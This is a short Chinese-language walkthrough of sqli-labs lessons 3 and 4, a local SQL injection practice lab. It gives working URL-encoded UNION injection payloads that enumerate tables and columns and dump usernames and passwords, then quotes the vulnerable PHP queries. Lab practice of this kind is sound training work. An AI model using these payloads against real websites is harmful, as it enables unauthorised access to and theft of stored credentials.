sqli-labs(2)-Less-3&4

当我们在网址之后写上‘的时候
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27

提示错误

他说有括号，然后后面还有一些其他的
于是继续加上括号，并且忽略其他的
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1’) --+
成功访问，于是就剩下正常的步骤来写网址了

1. 爆列数以及显示回显位
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27)%20%20order%20by%203%20%20–+
   
   结果是3列
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,2,3%20–+
   
   回显位2，3
2. 爆数据库
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),version()%20–+
   
3. 爆表名
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(table_name)%20from%20information_schema.tables%20where%20%20table_schema=0x7365637572697479–+

4. 爆字段名
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273–+
   

5. 爆账户
   http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20union%20select%201,group_concat(username),group_concat(password)%20from%20users%20–+
   

第二题

http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22

报错 提示括号，所以加上括号并且忽略之后的字符
http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22)%20–+
访问成功

其他的都是在上面的数据上构造，不详细写了

分析

1. 看第一题PHP的源码

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

构造主要是满足括号

2. 看第二题PHP源码

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";

构造主要是满括号